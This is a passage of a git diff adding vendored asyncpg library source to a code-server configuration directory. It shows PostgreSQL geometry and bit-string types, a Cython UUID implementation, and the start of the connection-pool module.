License: http://www.apache.org/licenses/LICENSE-2.0 + + +cdef extern from "./tohex.h": + cdef void uuid_to_str(const char *source, char *dest) + cdef void uuid_to_hex(const char *source, char *dest) diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/types.py b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/types.py new file mode 100755 index 0000000..0c45467 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/types.py @@ -0,0 +1,435 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + +from __future__ import annotations + +import typing + +if typing.TYPE_CHECKING: + import builtins + import sys + + if sys.version_info < (3, 11): + from typing_extensions import Self + else: + from typing import Self + + +__all__ = ( + 'BitString', 'Point', 'Path', 'Polygon', + 'Box', 'Line', 'LineSegment', 'Circle', +) + +_BitOrderType = typing.Literal['big', 'little'] + + +class BitString: + """Immutable representation of PostgreSQL `bit` and `varbit` types.""" + + __slots__ = '_bytes', '_bitlength' + + _bytes: bytes + _bitlength: int + + def __init__(self, + bitstring: builtins.bytes | None = None) -> None: + if not bitstring: + self._bytes = bytes() + self._bitlength = 0 + else: + bytelen = len(bitstring) // 8 + 1 + bytes_ = bytearray(bytelen) + byte = 0 + byte_pos = 0 + bit_pos = 0 + + for i, bit in enumerate(bitstring): + if bit == ' ': # type: ignore + continue + bit = int(bit) + if bit != 0 and bit != 1: + raise ValueError( + 'invalid bit value at position {}'.format(i)) + + byte |= bit << (8 - bit_pos - 1) + bit_pos += 1 + if bit_pos == 8: + bytes_[byte_pos] = byte + byte = 0 + byte_pos += 1 + bit_pos = 0 + + if bit_pos != 0: + bytes_[byte_pos] = byte + + bitlen = byte_pos * 8 + bit_pos + bytelen = byte_pos + (1 if bit_pos else 0) + + self._bytes = bytes(bytes_[:bytelen]) + self._bitlength = bitlen + + @classmethod + def frombytes(cls, + bytes_: builtins.bytes | None = None, + bitlength: int | None = None) -> Self: + if bitlength is None: + if bytes_ is None: + bytes_ = bytes() + bitlength = 0 + else: + bitlength = len(bytes_) * 8 + else: + if bytes_ is None: + bytes_ = bytes(bitlength // 8 + 1) + bitlength = bitlength + else: + bytes_len = len(bytes_) * 8 + + if bytes_len == 0 and bitlength != 0: + raise ValueError('invalid bit length specified') + + if bytes_len != 0 and bitlength == 0: + raise ValueError('invalid bit length specified') + + if bitlength < bytes_len - 8: + raise ValueError('invalid bit length specified') + + if bitlength > bytes_len: + raise ValueError('invalid bit length specified') + + result = cls() + result._bytes = bytes_ + result._bitlength = bitlength + + return result + + @property + def bytes(self) -> builtins.bytes: + return self._bytes + + def as_string(self) -> str: + s = '' + + for i in range(self._bitlength): + s += str(self._getitem(i)) + if i % 4 == 3: + s += ' ' + + return s.strip() + + def to_int(self, bitorder: _BitOrderType = 'big', + *, signed: bool = False) -> int: + """Interpret the BitString as a Python int. + Acts similarly to int.from_bytes. + + :param bitorder: + Determines the bit order used to interpret the BitString. By + default, this function uses Postgres conventions for casting bits + to ints. If bitorder is 'big', the most significant bit is at the + start of the string (this is the same as the default). If bitorder + is 'little', the most significant bit is at the end of the string. + + :param bool signed: + Determines whether two's complement is used to interpret the + BitString. If signed is False, the returned value is always + non-negative. + + :return int: An integer representing the BitString. Information about + the BitString's exact length is lost. + + .. versionadded:: 0.18.0 + """ + x = int.from_bytes(self._bytes, byteorder='big') + x >>= -self._bitlength % 8 + if bitorder == 'big': + pass + elif bitorder == 'little': + x = int(bin(x)[:1:-1].ljust(self._bitlength, '0'), 2) + else: + raise ValueError("bitorder must be either 'big' or 'little'") + + if signed and self._bitlength > 0 and x & (1 << (self._bitlength - 1)): + x -= 1 << self._bitlength + return x + + @classmethod + def from_int(cls, x: int, length: int, + bitorder: _BitOrderType = 'big', *, signed: bool = False) \ + -> Self: + """Represent the Python int x as a BitString. + Acts similarly to int.to_bytes. + + :param int x: + An integer to represent. Negative integers are represented in two's + complement form, unless the argument signed is False, in which case + negative integers raise an OverflowError. + + :param int length: + The length of the resulting BitString. An OverflowError is raised + if the integer is not representable in this many bits. + + :param bitorder: + Determines the bit order used in the BitString representation. By + default, this function uses Postgres conventions for casting ints + to bits. If bitorder is 'big', the most significant bit is at the + start of the string (this is the same as the default). If bitorder + is 'little', the most significant bit is at the end of the string. + + :param bool signed: + Determines whether two's complement is used in the BitString + representation. If signed is False and a negative integer is given, + an OverflowError is raised. + + :return BitString: A BitString representing the input integer, in the + form specified by the other input args. + + .. versionadded:: 0.18.0 + """ + # Exception types are by analogy to int.to_bytes + if length < 0: + raise ValueError("length argument must be non-negative") + elif length < x.bit_length(): + raise OverflowError("int too big to convert") + + if x < 0: + if not signed: + raise OverflowError("can't convert negative int to unsigned") + x &= (1 << length) - 1 + + if bitorder == 'big': + pass + elif bitorder == 'little': + x = int(bin(x)[:1:-1].ljust(length, '0'), 2) + else: + raise ValueError("bitorder must be either 'big' or 'little'") + + x <<= (-length % 8) + bytes_ = x.to_bytes((length + 7) // 8, byteorder='big') + return cls.frombytes(bytes_, length) + + def __repr__(self) -> str: + return ''.format(self.as_string()) + + __str__: typing.Callable[['BitString'], str] = __repr__ + + def __eq__(self, other: object) -> bool: + if not isinstance(other, BitString): + return NotImplemented + + return (self._bytes == other._bytes and + self._bitlength == other._bitlength) + + def __hash__(self) -> int: + return hash((self._bytes, self._bitlength)) + + def _getitem(self, i: int) -> int: + byte = self._bytes[i // 8] + shift = 8 - i % 8 - 1 + return (byte >> shift) & 0x1 + + def __getitem__(self, i: int) -> int: + if isinstance(i, slice): + raise NotImplementedError('BitString does not support slices') + + if i >= self._bitlength: + raise IndexError('index out of range') + + return self._getitem(i) + + def __len__(self) -> int: + return self._bitlength + + +class Point(typing.Tuple[float, float]): + """Immutable representation of PostgreSQL `point` type.""" + + __slots__ = () + + def __new__( + cls, + x: ( + typing.SupportsFloat | + typing.SupportsIndex | + str | + builtins.bytes | + builtins.bytearray + ), + y: ( + typing.SupportsFloat | + typing.SupportsIndex | + str | + builtins.bytes | + builtins.bytearray + ) + ) -> Self: + return super().__new__(cls, + typing.cast(typing.Any, (float(x), float(y)))) + + def __repr__(self) -> str: + return '{}.{}({})'.format( + type(self).__module__, + type(self).__name__, + tuple.__repr__(self) + ) + + @property + def x(self) -> float: + return self[0] + + @property + def y(self) -> float: + return self[1] + + +class Box(typing.Tuple[Point, Point]): + """Immutable representation of PostgreSQL `box` type.""" + + __slots__ = () + + def __new__(cls, high: typing.Sequence[float], + low: typing.Sequence[float]) -> Self: + return super().__new__(cls, + typing.cast(typing.Any, (Point(*high), + Point(*low)))) + + def __repr__(self) -> str: + return '{}.{}({})'.format( + type(self).__module__, + type(self).__name__, + tuple.__repr__(self) + ) + + @property + def high(self) -> Point: + return self[0] + + @property + def low(self) -> Point: + return self[1] + + +class Line(typing.Tuple[float, float, float]): + """Immutable representation of PostgreSQL `line` type.""" + + __slots__ = () + + def __new__(cls, A: float, B: float, C: float) -> Self: + return super().__new__(cls, typing.cast(typing.Any, (A, B, C))) + + @property + def A(self) -> float: + return self[0] + + @property + def B(self) -> float: + return self[1] + + @property + def C(self) -> float: + return self[2] + + +class LineSegment(typing.Tuple[Point, Point]): + """Immutable representation of PostgreSQL `lseg` type.""" + + __slots__ = () + + def __new__(cls, p1: typing.Sequence[float], + p2: typing.Sequence[float]) -> Self: + return super().__new__(cls, + typing.cast(typing.Any, (Point(*p1), + Point(*p2)))) + + def __repr__(self) -> str: + return '{}.{}({})'.format( + type(self).__module__, + type(self).__name__, + tuple.__repr__(self) + ) + + @property + def p1(self) -> Point: + return self[0] + + @property + def p2(self) -> Point: + return self[1] + + +class Path: + """Immutable representation of PostgreSQL `path` type.""" + + __slots__ = '_is_closed', 'points' + + points: typing.Tuple[Point, ...] + + def __init__(self, *points: typing.Sequence[float], + is_closed: bool = False) -> None: + self.points = tuple(Point(*p) for p in points) + self._is_closed = is_closed + + @property + def is_closed(self) -> bool: + return self._is_closed + + def __eq__(self, other: object) -> bool: + if not isinstance(other, Path): + return NotImplemented + + return (self.points == other.points and + self._is_closed == other._is_closed) + + def __hash__(self) -> int: + return hash((self.points, self.is_closed)) + + def __iter__(self) -> typing.Iterator[Point]: + return iter(self.points) + + def __len__(self) -> int: + return len(self.points) + + @typing.overload + def __getitem__(self, i: int) -> Point: + ... + + @typing.overload + def __getitem__(self, i: slice) -> typing.Tuple[Point, ...]: + ... + + def __getitem__( + self, i: int | slice + ) -> Point | typing.Tuple[Point, ...]: + return self.points[i] + + def __contains__(self, point: object) -> bool: + return point in self.points + + +class Polygon(Path): + """Immutable representation of PostgreSQL `polygon` type.""" + + __slots__ = () + + def __init__(self, *points: typing.Sequence[float]) -> None: + # polygon is always closed + super().__init__(*points, is_closed=True) + + +class Circle(typing.Tuple[Point, float]): + """Immutable representation of PostgreSQL `circle` type.""" + + __slots__ = () + + def __new__(cls, center: Point, radius: float) -> Self: + return super().__new__(cls, typing.cast(typing.Any, (center, radius))) + + @property + def center(self) -> Point: + return self[0] + + @property + def radius(self) -> float: + return self[1] diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/uuid.pyx b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/uuid.pyx new file mode 100755 index 0000000..e1accd2 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/uuid.pyx @@ -0,0 +1,359 @@ +import functools +import uuid + +cimport cython +cimport cpython + +from libc.stdint cimport uint8_t, int8_t +from libc.string cimport memcpy, memcmp + + +cdef extern from "Python.h": + int PyUnicode_1BYTE_KIND + const char* PyUnicode_AsUTF8AndSize( + object unicode, Py_ssize_t *size) except NULL + object PyUnicode_FromKindAndData( + int kind, const void *buffer, Py_ssize_t size) + + +cdef extern from "./tohex.h": + cdef void uuid_to_str(const char *source, char *dest) + cdef void uuid_to_hex(const char *source, char *dest) + + +# A more efficient UUID type implementation +# (6-7x faster than the starndard uuid.UUID): +# +# -= Benchmark results (less is better): =- +# +# std_UUID(bytes): 1.2368 +# c_UUID(bytes): * 0.1645 (7.52x) +# object(): 0.1483 +# +# std_UUID(str): 1.8038 +# c_UUID(str): * 0.2313 (7.80x) +# +# str(std_UUID()): 1.4625 +# str(c_UUID()): * 0.2681 (5.46x) +# str(object()): 0.5975 +# +# std_UUID().bytes: 0.3508 +# c_UUID().bytes: * 0.1068 (3.28x) +# +# std_UUID().int: 0.0871 +# c_UUID().int: * 0.0856 +# +# std_UUID().hex: 0.4871 +# c_UUID().hex: * 0.1405 +# +# hash(std_UUID()): 0.3635 +# hash(c_UUID()): * 0.1564 (2.32x) +# +# dct[std_UUID()]: 0.3319 +# dct[c_UUID()]: * 0.1570 (2.11x) +# +# std_UUID() ==: 0.3478 +# c_UUID() ==: * 0.0915 (3.80x) + + +cdef char _hextable[256] +_hextable[:] = [ + -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1, + -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1, + -1,-1, 0,1,2,3,4,5,6,7,8,9,-1,-1,-1,-1,-1,-1,-1,10,11,12,13,14,15,-1, + -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1, + -1,-1,10,11,12,13,14,15,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1, + -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1, + -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1, + -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1, + -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1, + -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1, + -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1 +] + + +std_UUID = uuid.UUID + + +cdef pg_uuid_bytes_from_str(str u, char *out): + cdef: + const char *orig_buf + Py_ssize_t size + unsigned char ch + uint8_t acc, part, acc_set + int i, j + + orig_buf = PyUnicode_AsUTF8AndSize(u, &size) + if size > 36 or size < 32: + raise ValueError( + f'invalid UUID {u!r}: ' + f'length must be between 32..36 characters, got {size}') + + acc_set = 0 + j = 0 + for i in range(size): + ch = orig_buf[i] + if ch == b'-': + continue + + part = _hextable[ch] + if part == -1: + if ch >= 0x20 and ch <= 0x7e: + raise ValueError( + f'invalid UUID {u!r}: unexpected character {chr(ch)!r}') + else: + raise ValueError('invalid UUID {u!r}: unexpected character') + + if acc_set: + acc |= part + out[j] = acc + acc_set = 0 + j += 1 + else: + acc = (part << 4) + acc_set = 1 + + if j > 16 or (j == 16 and acc_set): + raise ValueError( + f'invalid UUID {u!r}: decodes to more than 16 bytes') + + if j != 16: + raise ValueError( + f'invalid UUID {u!r}: decodes to less than 16 bytes') + + +cdef class __UUIDReplaceMe: + pass + + +cdef pg_uuid_from_buf(const char *buf): + cdef: + UUID u = UUID.__new__(UUID) + memcpy(u._data, buf, 16) + return u + + +@cython.final +@cython.no_gc_clear +cdef class UUID(__UUIDReplaceMe): + + cdef: + char _data[16] + object _int + object _hash + object __weakref__ + + def __cinit__(self): + self._int = None + self._hash = None + + def __init__(self, inp): + cdef: + char *buf + Py_ssize_t size + + if cpython.PyBytes_Check(inp): + cpython.PyBytes_AsStringAndSize(inp, &buf, &size) + if size != 16: + raise ValueError(f'16 bytes were expected, got {size}') + memcpy(self._data, buf, 16) + + elif cpython.PyUnicode_Check(inp): + pg_uuid_bytes_from_str(inp, self._data) + else: + raise TypeError(f'a bytes or str object expected, got {inp!r}') + + @property + def bytes(self): + return cpython.PyBytes_FromStringAndSize(self._data, 16) + + @property + def int(self): + if self._int is None: + # The cache is important because `self.int` can be + # used multiple times by __hash__ etc. + # + # The or 0 works around a bug interaction between cpython + # 3.10 and earlier and Cython ~3.0.11 in which + # int.from_bytes returns a "non-canonical 0" and then + # Cython's implementation of & mishandles it. + # See cython/cython#6480. + self._int = int.from_bytes(self.bytes, 'big') or 0 + return self._int + + @property + def is_safe(self): + return uuid.SafeUUID.unknown + + def __str__(self): + cdef char out[36] + uuid_to_str(self._data, out) + return PyUnicode_FromKindAndData(PyUnicode_1BYTE_KIND, out, 36) + + @property + def hex(self): + cdef char out[32] + uuid_to_hex(self._data, out) + return PyUnicode_FromKindAndData(PyUnicode_1BYTE_KIND, out, 32) + + def __repr__(self): + return f"UUID('{self}')" + + def __reduce__(self): + return (type(self), (self.bytes,)) + + def __eq__(self, other): + if type(other) is UUID: + return memcmp(self._data, (other)._data, 16) == 0 + if isinstance(other, std_UUID): + return self.int == other.int + return NotImplemented + + def __ne__(self, other): + if type(other) is UUID: + return memcmp(self._data, (other)._data, 16) != 0 + if isinstance(other, std_UUID): + return self.int != other.int + return NotImplemented + + def __lt__(self, other): + if type(other) is UUID: + return memcmp(self._data, (other)._data, 16) < 0 + if isinstance(other, std_UUID): + return self.int < other.int + return NotImplemented + + def __gt__(self, other): + if type(other) is UUID: + return memcmp(self._data, (other)._data, 16) > 0 + if isinstance(other, std_UUID): + return self.int > other.int + return NotImplemented + + def __le__(self, other): + if type(other) is UUID: + return memcmp(self._data, (other)._data, 16) <= 0 + if isinstance(other, std_UUID): + return self.int <= other.int + return NotImplemented + + def __ge__(self, other): + if type(other) is UUID: + return memcmp(self._data, (other)._data, 16) >= 0 + if isinstance(other, std_UUID): + return self.int >= other.int + return NotImplemented + + def __hash__(self): + # In EdgeDB every schema object has a uuid and there are + # huge hash-maps of them. We want UUID.__hash__ to be + # as fast as possible. + if self._hash is not None: + return self._hash + + self._hash = hash(self.int) + return self._hash + + def __int__(self): + return self.int + + @property + def bytes_le(self): + bytes = self.bytes + return (bytes[4-1::-1] + bytes[6-1:4-1:-1] + bytes[8-1:6-1:-1] + + bytes[8:]) + + @property + def fields(self): + return (self.time_low, self.time_mid, self.time_hi_version, + self.clock_seq_hi_variant, self.clock_seq_low, self.node) + + @property + def time_low(self): + return self.int >> 96 + + @property + def time_mid(self): + return (self.int >> 80) & 0xffff + + @property + def time_hi_version(self): + return (self.int >> 64) & 0xffff + + @property + def clock_seq_hi_variant(self): + return (self.int >> 56) & 0xff + + @property + def clock_seq_low(self): + return (self.int >> 48) & 0xff + + @property + def time(self): + return (((self.time_hi_version & 0x0fff) << 48) | + (self.time_mid << 32) | self.time_low) + + @property + def clock_seq(self): + return (((self.clock_seq_hi_variant & 0x3f) << 8) | + self.clock_seq_low) + + @property + def node(self): + return self.int & 0xffffffffffff + + @property + def urn(self): + return 'urn:uuid:' + str(self) + + @property + def variant(self): + if not self.int & (0x8000 << 48): + return uuid.RESERVED_NCS + elif not self.int & (0x4000 << 48): + return uuid.RFC_4122 + elif not self.int & (0x2000 << 48): + return uuid.RESERVED_MICROSOFT + else: + return uuid.RESERVED_FUTURE + + @property + def version(self): + # The version bits are only meaningful for RFC 4122 UUIDs. + if self.variant == uuid.RFC_4122: + return int((self.int >> 76) & 0xf) + + +# +# In order for `isinstance(pgproto.UUID, uuid.UUID)` to work, +# patch __bases__ and __mro__ by injecting `uuid.UUID`. +# +# We apply brute-force here because the following pattern stopped +# working with Python 3.8: +# +# cdef class OurUUID: +# ... +# +# class UUID(OurUUID, uuid.UUID): +# ... +# +# With Python 3.8 it now produces +# +# "TypeError: multiple bases have instance lay-out conflict" +# +# error. Maybe it's possible to fix this some other way, but +# the best solution possible would be to just contribute our +# faster UUID to the standard library and not have this problem +# at all. For now this hack is pretty safe and should be +# compatible with future Pythons for long enough. +# +assert UUID.__bases__[0] is __UUIDReplaceMe +assert UUID.__mro__[1] is __UUIDReplaceMe +cpython.Py_INCREF(std_UUID) +cpython.PyTuple_SET_ITEM(UUID.__bases__, 0, std_UUID) +cpython.Py_INCREF(std_UUID) +cpython.PyTuple_SET_ITEM(UUID.__mro__, 1, std_UUID) +# + + +pg_UUID = UUID diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pool.py b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pool.py new file mode 100755 index 0000000..5c7ea9c --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pool.py @@ -0,0 +1,1248 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + +from __future__ import annotations + +import asyncio +from collections.abc import Awaitable, Callable +import functools +import inspect +import logging +import time +from types import TracebackType +from typing import Any, Optional, Type +import warnings + +from . import compat +from . import connection +from . import exceptions +from . import protocol + + +logger = logging.getLogger(__name__) + + +class PoolConnectionProxyMeta(type): + + def __new__( + mcls, + name: str, + bases: tuple[Type[Any], ...], + dct: dict[str, Any], + *, + wrap: bool = False, + ) -> PoolConnectionProxyMeta: + if wrap: + for attrname in dir(connection.Connection): + if attrname.startswith('_') or attrname in dct: + continue + + meth = getattr(connection.Connection, attrname) + if not inspect.isfunction(meth): + continue + + iscoroutine = inspect.iscoroutinefunction(meth) + wrapper = mcls._wrap_connection_method(attrname, iscoroutine) + wrapper = functools.update_wrapper(wrapper, meth) + dct[attrname] = wrapper + + if '__doc__' not in dct: + dct['__doc__'] = connection.Connection.__doc__ + + return super().__new__(mcls, name, bases, dct) + + @staticmethod + def _wrap_connection_method( + meth_name: str, iscoroutine: bool + ) -> Callable[..., Any]: + def call_con_method(self: Any, *args: Any, **kwargs: Any) -> Any: + # This method will be owned by PoolConnectionProxy class. + if self._con is None: + raise exceptions.InterfaceError( + 'cannot call Connection.{}(): ' + 'connection has been released back to the pool'.format( + meth_name)) + + meth = getattr(self._con.__class__, meth_name) + return meth(self._con, *args, **kwargs) + + if iscoroutine: + compat.markcoroutinefunction(call_con_method) + + return call_con_method + + +class PoolConnectionProxy(connection._ConnectionProxy, + metaclass=PoolConnectionProxyMeta, + wrap=True): + + __slots__ = ('_con', '_holder') + + def __init__( + self, holder: PoolConnectionHolder, con: connection.Connection + ) -> None: + self._con = con + self._holder = holder + con._set_proxy(self) + + def __getattr__(self, attr: str) -> Any: + # Proxy all unresolved attributes to the wrapped Connection object. + return getattr(self._con, attr) + + def _detach(self) -> Optional[connection.Connection]: + if self._con is None: + return + + con, self._con = self._con, None + con._set_proxy(None) + return con + + def __repr__(self) -> str: + if self._con is None: + return '<{classname} [released] {id:#x}>'.format( + classname=self.__class__.__name__, id=id(self)) + else: + return '<{classname} {con!r} {id:#x}>'.format( + classname=self.__class__.__name__, con=self._con, id=id(self)) + + +class PoolConnectionHolder: + + __slots__ = ('_con', '_pool', '_loop', '_proxy', + '_max_queries', '_setup', + '_max_inactive_time', '_in_use', + '_inactive_callback', '_timeout', + '_generation') + + def __init__( + self, + pool: "Pool", + *, + max_queries: float, + setup: Optional[Callable[[PoolConnectionProxy], Awaitable[None]]], + max_inactive_time: float, + ) -> None: + + self._pool = pool + self._con: Optional[connection.Connection] = None + self._proxy: Optional[PoolConnectionProxy] = None + + self._max_queries = max_queries + self._max_inactive_time = max_inactive_time + self._setup = setup + self._inactive_callback: Optional[Callable] = None + self._in_use: Optional[asyncio.Future] = None + self._timeout: Optional[float] = None + self._generation: Optional[int] = None + + def is_connected(self) -> bool: + return self._con is not None and not self._con.is_closed() + + def is_idle(self) -> bool: + return not self._in_use + + async def connect(self) -> None: + if self._con is not None: + raise exceptions.InternalClientError( + 'PoolConnectionHolder.connect() called while another ' + 'connection already exists') + + self._con = await self._pool._get_new_connection() + self._generation = self._pool._generation + self._maybe_cancel_inactive_callback() + self._setup_inactive_callback() + + async def acquire(self) -> PoolConnectionProxy: + if self._con is None or self._con.is_closed(): + self._con = None + await self.connect() + + elif self._generation != self._pool._generation: + # Connections have been expired, re-connect the holder. + self._pool._loop.create_task( + self._con.close(timeout=self._timeout)) + self._con = None + await self.connect() + + self._maybe_cancel_inactive_callback() + + self._proxy = proxy = PoolConnectionProxy(self, self._con) + + if self._setup is not None: + try: + await self._setup(proxy) + except (Exception, asyncio.CancelledError) as ex: + # If a user-defined `setup` function fails, we don't + # know if the connection is safe for re-use, hence + # we close it. A new connection will be created + # when `acquire` is called again. + try: + # Use `close()` to close the connection gracefully. + # An exception in `setup` isn't necessarily caused + # by an IO or a protocol error. close() will + # do the necessary cleanup via _release_on_close(). + await self._con.close() + finally: + raise ex + + self._in_use = self._pool._loop.create_future() + + return proxy + + async def release(self, timeout: Optional[float]) -> None: + if self._in_use is None: + raise exceptions.InternalClientError( + 'PoolConnectionHolder.release() called on ' + 'a free connection holder') + + if self._con.is_closed(): + # When closing, pool connections perform the necessary + # cleanup, so we don't have to do anything else here. + return + + self._timeout = None + + if self._con._protocol.queries_count >= self._max_queries: + # The connection has reached its maximum utilization limit, + # so close it. Connection.close() will call _release(). + await self._con.close(timeout=timeout) + return + + if self._generation != self._pool._generation: + # The connection has expired because it belongs to + # an older generation (Pool.expire_connections() has + # been called.) + await self._con.close(timeout=timeout) + return + + try: + budget = timeout + + if self._con._protocol._is_cancelling(): + # If the connection is in cancellation state, + # wait for the cancellation + started = time.monotonic() + await compat.wait_for( + self._con._protocol._wait_for_cancellation(), + budget) + if budget is not None: + budget -= time.monotonic() - started + + if self._pool._reset is not None: + async with compat.timeout(budget): + await self._con._reset() + await self._pool._reset(self._con) + else: + await self._con.reset(timeout=budget) + except (Exception, asyncio.CancelledError) as ex: + # If the `reset` call failed, terminate the connection. + # A new one will be created when `acquire` is called + # again. + try: + # An exception in `reset` is most likely caused by + # an IO error, so terminate the connection. + self._con.terminate() + finally: + raise ex + + # Free this connection holder and invalidate the + # connection proxy. + self._release() + + # Rearm the connection inactivity timer. + self._setup_inactive_callback() + + async def wait_until_released(self) -> None: + if self._in_use is None: + return + else: + await self._in_use + + async def close(self) -> None: + if self._con is not None: + # Connection.close() will call _release_on_close() to + # finish holder cleanup. + await self._con.close() + + def terminate(self) -> None: + if self._con is not None: + # Connection.terminate() will call _release_on_close() to + # finish holder cleanup. + self._con.terminate() + + def _setup_inactive_callback(self) -> None: + if self._inactive_callback is not None: + raise exceptions.InternalClientError( + 'pool connection inactivity timer already exists') + + if self._max_inactive_time: + self._inactive_callback = self._pool._loop.call_later( + self._max_inactive_time, self._deactivate_inactive_connection) + + def _maybe_cancel_inactive_callback(self) -> None: + if self._inactive_callback is not None: + self._inactive_callback.cancel() + self._inactive_callback = None + + def _deactivate_inactive_connection(self) -> None: + if self._in_use is not None: + raise exceptions.InternalClientError( + 'attempting to deactivate an acquired connection') + + if self._con is not None: + # The connection is idle and not in use, so it's fine to + # use terminate() instead of close(). + self._con.terminate() + # Must call clear_connection, because _deactivate_connection + # is called when the connection is *not* checked out, and + # so terminate() above will not call the below. + self._release_on_close() + + def _release_on_close(self) -> None: + self._maybe_cancel_inactive_callback() + self._release() + self._con = None + + def _release(self) -> None: + """Release this connection holder.""" + if self._in_use is None: + # The holder is not checked out. + return + + if not self._in_use.done(): + self._in_use.set_result(None) + self._in_use = None + + # Deinitialize the connection proxy. All subsequent + # operations on it will fail. + if self._proxy is not None: + self._proxy._detach() + self._proxy = None + + # Put ourselves back to the pool queue. + self._pool._queue.put_nowait(self) + + +class Pool: + """A connection pool. + + Connection pool can be used to manage a set of connections to the database. + Connections are first acquired from the pool, then used, and then released + back to the pool. Once a connection is released, it's reset to close all + open cursors and other resources *except* prepared statements. + + Pools are created by calling :func:`~asyncpg.pool.create_pool`. + """ + + __slots__ = ( + '_queue', '_loop', '_minsize', '_maxsize', + '_init', '_connect', '_reset', '_connect_args', '_connect_kwargs', + '_holders', '_initialized', '_initializing', '_closing', + '_closed', '_connection_class', '_record_class', '_generation', + '_setup', '_max_queries', '_max_inactive_connection_lifetime' + ) + + def __init__(self, *connect_args, + min_size, + max_size, + max_queries, + max_inactive_connection_lifetime, + connect=None, + setup=None, + init=None, + reset=None, + loop, + connection_class, + record_class, + **connect_kwargs): + + if len(connect_args) > 1: + warnings.warn( + "Passing multiple positional arguments to asyncpg.Pool " + "constructor is deprecated and will be removed in " + "asyncpg 0.17.0. The non-deprecated form is " + "asyncpg.Pool(, **kwargs)", + DeprecationWarning, stacklevel=2) + + if loop is None: + loop = asyncio.get_event_loop() + self._loop = loop + + if max_size <= 0: + raise ValueError('max_size is expected to be greater than zero') + + if min_size < 0: + raise ValueError( + 'min_size is expected to be greater or equal to zero') + + if min_size > max_size: + raise ValueError('min_size is greater than max_size') + + if max_queries <= 0: + raise ValueError('max_queries is expected to be greater than zero') + + if max_inactive_connection_lifetime < 0: + raise ValueError( + 'max_inactive_connection_lifetime is expected to be greater ' + 'or equal to zero') + + if not issubclass(connection_class, connection.Connection): + raise TypeError( + 'connection_class is expected to be a subclass of ' + 'asyncpg.Connection, got {!r}'.format(connection_class)) + + if not issubclass(record_class, protocol.Record): + raise TypeError( + 'record_class is expected to be a subclass of ' + 'asyncpg.Record, got {!r}'.format(record_class)) + + self._minsize = min_size + self._maxsize = max_size + + self._holders = [] + self._initialized = False + self._initializing = False + self._queue = None + + self._connection_class = connection_class + self._record_class = record_class + + self._closing = False + self._closed = False + self._generation = 0 + + self._connect = connect if connect is not None else connection.connect + self._connect_args = connect_args + self._connect_kwargs = connect_kwargs + + self._setup = setup + self._init = init + self._reset = reset + + self._max_queries = max_queries + self._max_inactive_connection_lifetime = \ + max_inactive_connection_lifetime + + async def _async__init__(self): + if self._initialized: + return self + if self._initializing: + raise exceptions.InterfaceError( + 'pool is being initialized in another task') + if self._closed: + raise exceptions.InterfaceError('pool is closed') + self._initializing = True + try: + await self._initialize() + return self + finally: + self._initializing = False + self._initialized = True + + async def _initialize(self): + self._queue = asyncio.LifoQueue(maxsize=self._maxsize) + for _ in range(self._maxsize): + ch = PoolConnectionHolder( + self, + max_queries=self._max_queries, + max_inactive_time=self._max_inactive_connection_lifetime, + setup=self._setup) + + self._holders.append(ch) + self._queue.put_nowait(ch) + + if self._minsize: + # Since we use a LIFO queue, the first items in the queue will be + # the last ones in `self._holders`. We want to pre-connect the + # first few connections in the queue, therefore we want to walk + # `self._holders` in reverse. + + # Connect the first connection holder in the queue so that + # any connection issues are visible early. + first_ch = self._holders[-1] # type: PoolConnectionHolder + await first_ch.connect() + + if self._minsize > 1: + connect_tasks = [] + for i, ch in enumerate(reversed(self._holders[:-1])): + # `minsize - 1` because we already have first_ch + if i >= self._minsize - 1: + break + connect_tasks.append(ch.connect()) + + await asyncio.gather(*connect_tasks) + + def is_closing(self): + """Return ``True`` if the pool is closing or is closed. + + .. versionadded:: 0.28.0 + """ + return self._closed or self._closing + + def get_size(self): + """Return the current number of connections in this pool. + + .. versionadded:: 0.25.0 + """ + return sum(h.is_connected() for h in self._holders) + + def get_min_size(self): + """Return the minimum number of connections in this pool. + + .. versionadded:: 0.25.0 + """ + return self._minsize + + def get_max_size(self): + """Return the maximum allowed number of connections in this pool. + + .. versionadded:: 0.25.0 + """ + return self._maxsize + + def get_idle_size(self): + """Return the current number of idle connections in this pool. + + .. versionadded:: 0.25.0 + """ + return sum(h.is_connected() and h.is_idle() for h in self._holders) + + def set_connect_args(self, dsn=None, **connect_kwargs): + r"""Set the new connection arguments for this pool. + + The new connection arguments will be used for all subsequent + new connection attempts. Existing connections will remain until + they 